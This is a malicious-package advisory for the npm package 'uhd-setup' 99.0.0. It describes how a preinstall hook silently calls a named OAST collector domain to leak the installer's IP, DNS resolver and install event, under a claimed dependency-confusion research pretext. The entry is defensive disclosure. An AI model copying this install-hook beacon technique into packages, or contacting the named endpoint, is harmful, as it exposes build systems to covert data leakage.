MAL-2026-5287

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8cd16b0b6896b16874da441b7197b846bf0c725dcff0ef2d6e8f93c6cc08fc99) package.json declares `scripts.preinstall: node index.js`. On `npm install`, index.js (lines 4-5) performs `dns.resolve` and `https.get` against `<id>.d8hiivedv3ok8hrng5eghchyw4hwsioaz.oast.online`, an Interactsh OAST collector. The request fires unconditionally with no opt-out, leaking the installer's egress IP, internal DNS resolver identity, and fact-of-install (with the package id encoded in the subdomain and URL path) to a third-party-controlled endpoint. The README frames this as authorized dependency-confusion research targeting Ubiquiti, but the beacon does not gate on any organizational identifier — any installer that pulls this name (typo, internal-name collision, automated mirror) sends build-system metadata to the researcher. Trigger is the preinstall lifecycle hook, so the network call fires before any code review opportunity.

## Source: ossf-package-analysis (358eee34aaba61eaa93e977d35a18f35f59a56527d7c20b6e9a0bdf9c4a0a8da) The OpenSSF Package Analysis project identified 'uhd-setup' @ 99.0.0 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.